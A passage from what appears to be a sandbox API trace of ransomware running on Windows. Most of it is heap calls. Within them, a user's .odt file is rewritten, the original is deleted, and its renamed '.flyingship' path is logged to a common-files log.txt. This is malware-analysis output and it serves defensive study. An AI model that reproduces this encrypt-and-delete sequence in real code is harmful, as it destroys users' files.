(hModule=0x75990000, lpProcName="WriteFile") returned 0x759a1282 [0178.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0178.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0178.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0178.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0178.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0178.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0178.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0178.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0178.060] WriteFile (in: hFile=0x138, lpBuffer=0x8fff00*, nNumberOfBytesToWrite=0x58fc, lpNumberOfBytesWritten=0x87eae0, lpOverlapped=0x0 | out: lpBuffer=0x8fff00*, lpNumberOfBytesWritten=0x87eae0*=0x58fc, lpOverlapped=0x0) returned 1 [0178.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0178.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0178.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0178.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0178.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0178.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0178.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0178.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0178.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0178.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0178.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0178.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0178.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0178.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0178.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0178.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0178.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0178.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0178.061] FreeLibrary (hLibModule=0x75990000) returned 1 [0178.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0178.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0178.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0178.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0178.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0178.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0178.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0178.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0178.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0178.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0178.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0178.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0178.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0178.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0178.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0178.062] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0178.062] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0178.062] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0178.062] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0178.062] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0178.062] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0178.062] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0178.062] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.062] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.062] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.062] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.062] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0178.062] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.062] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0178.062] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0178.063] FreeLibrary (hLibModule=0x75990000) returned 1 [0178.063] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.063] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.064] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.064] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\GvoASfHILqm4y.odt", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\GvoASfHILqm4y.odt", lpFilePart=0x0) returned 0x49 [0178.064] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\GvoASfHILqm4y.odt", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e07ddb0, ftCreationTime.dwHighDateTime=0x1d5e195, ftLastAccessTime.dwLowDateTime=0x9abbf600, ftLastAccessTime.dwHighDateTime=0x1d5de7f, ftLastWriteTime.dwLowDateTime=0xf759160, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x58fc, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="GvoASfHILqm4y.odt", cAlternateFileName="GVOASF~1.ODT")) returned 0x90ae18 [0178.065] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\GvoASfHILqm4y.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf\\gvoasfhilqm4y.odt")) returned 1 [0178.068] FindNextFileW (in: hFindFile=0x90ae18, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e07ddb0, ftCreationTime.dwHighDateTime=0x1d5e195, ftLastAccessTime.dwLowDateTime=0x9abbf600, ftLastAccessTime.dwHighDateTime=0x1d5de7f, ftLastWriteTime.dwLowDateTime=0xf759160, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x58fc, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="GvoASfHILqm4y.odt", cAlternateFileName="GVOASF~1.ODT")) returned 0 [0178.068] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0178.068] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.069] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0178.069] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0178.069] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0178.069] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0178.069] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dt", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0178.069] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="odt", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0178.069] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".odt", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0178.069] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0178.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0178.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0178.069] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0178.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0178.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0178.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0178.069] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0178.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0178.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0178.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0178.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0178.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0178.070] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0178.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0178.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0178.071] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0178.071] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0178.071] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0178.071] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0178.071] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0178.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0178.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0178.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0178.071] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0178.071] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x17ee, lpOverlapped=0x0) returned 1 [0178.072] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0178.072] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x17ee, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0178.072] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0178.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0178.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0178.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0178.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0178.072] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\GvoASfHILqm4y.flyingship.odt\r\n", cchWideChar=87, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 87 [0178.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x57) returned 0x8c4a48 [0178.072] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\GvoASfHILqm4y.flyingship.odt\r\n", cchWideChar=87, lpMultiByteStr=0x8c4a48, cbMultiByte=87, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\GvoASfHILqm4y.flyingship.odt\r\n", lpUsedDefaultChar=0x0) returned 87 [0178.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0178.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5d10 [0178.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c4a48 | out: hHeap=0x8a0000) returned 1 [0178.072] WriteFile (in: hFile=0x138, lpBuffer=0x9a5d10*, nNumberOfBytesToWrite=0x56, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9a5d10*, lpNumberOfBytesWritten=0x87f43c*=0x56, lpOverlapped=0x0) returned 1 [0178.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d10 | out: hHeap=0x8a0000) returned 1 [0178.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0178.073] CloseHandle (hObject=0x138) returned 1 [0178.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0178.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0178.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0178.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0178.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0178.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0178.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0178.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0178.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fff00 | out: hHeap=0x8a0000) returned 1 [0178.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0178.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0178.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0178.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0178.075] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0178.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0178.075] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0178.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0178.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0178.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0178.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0178.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0178.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8f9100 | out: hHeap=0x8a0000) returned 1 [0178.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0178.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0178.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0178.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0178.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0178.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0178.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0178.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0178.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0178.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0178.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0178.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0178.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0178.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0178.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0178.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0178.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0178.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0178.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0178.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0178.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0178.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0178.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0178.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0178.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0178.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0178.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0178.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0178.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0178.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0178.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0178.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0178.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0178.076] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0178.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0178.076] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0178.076] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0178.076] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0178.076] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0178.077] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0178.077] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0178.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0178.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0178.077] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0178.077] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1af0 [0178.077] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0178.077] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0178.077] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0178.077] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0178.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0178.077] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 